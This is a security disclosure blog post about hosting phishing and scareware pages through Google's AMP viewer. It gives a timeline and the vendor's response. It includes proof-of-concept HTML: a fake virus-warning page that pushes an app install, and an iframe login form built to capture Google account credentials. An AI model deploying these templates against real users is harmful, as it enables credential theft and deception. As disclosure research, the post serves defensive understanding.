Advisory: Using to Host Malicious Mobile Content


It is possible to use a flaw in to host malicious content. However, such content is not able to interact with anything on domain itself.


Google’s main website provides a subsite for displaying mobile-optimized pages published using a special subset of HTML called AMP. The current implementation can display any AMP page on the Internet without checking content. The URL is as follows:

where XXXX is the URL of the site. This ONLY works on mobile devices and can be simulated using Chrome’s developer tools, but on desktop browsers, it will redirect to the page itself (as described in our earlier post). Here is a real working example:

Example of AMP site running on directly

This, however, can be used to display malicious content. Due to the way AMP is designed, AMP pages are not allowed to have Javascript, or “javascript:” URLs. They can, however, have URLs that lead to the Google Play store or iTunes. This can be leveraged to fool users into installing apps they don’t need — all on Here is an example screenshot — note the URL and that a valid certificate is used. The link goes to the Google play store.

Source code - BODY tag only, rest is standard AMP HTML (see here):
<body><amp-img src=”glogo.jpg” alt=”logo” height=”200px” width=”300px”></amp-img> <h3>We have scanned your phone and found it to be infected with a virus. To clean your off, please click on the link below</h3> <p><a href=”">Clean My Phone</a></p></body>

Taking this a step further, while AMP does not allow forms and Javascript in the main page, it does allow Javascript and forms in an iframe, as long as that iframe is at least 75% down from the top of the page. This can be used to do the following — embedding a malicious login form inside an iframe which then can be used to steal people’s Google account credentials. Example screenshot and source below — this is not styled since it is a POC.


Main page BODY:

<amp-img src=”glogo.jpg” alt=”logo” height=”300px” width=”300px”></amp-img>
<amp-img src=”glogo.jpg” alt=”logo” height=”300px” width=”300px”></amp-img>
<h3>You have logged out of your account, please login again below</h3>
<amp-iframe width=”300px” height=”300px”
    sandbox=”allow-scripts allow-forms” layout=”responsive”
    frameborder=”0" src=”iframe.html">

Iframe Source:

<!doctype html>
 <meta charset=”utf-8">
 <form action=””>
 Email: <input type=”text” name=”email”/><br/>
 Password: <input type=”password” name=”password”/><br/>
 <input type=”submit”/>

Vendor Response

The vendor has communicated that they do not consider this to be a security issue



Researched and written by Yakov Shafranovich.


2016–04–12: Vendor notified
2016–04–13: Vendor response
2016–04–13: Public disclosure

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.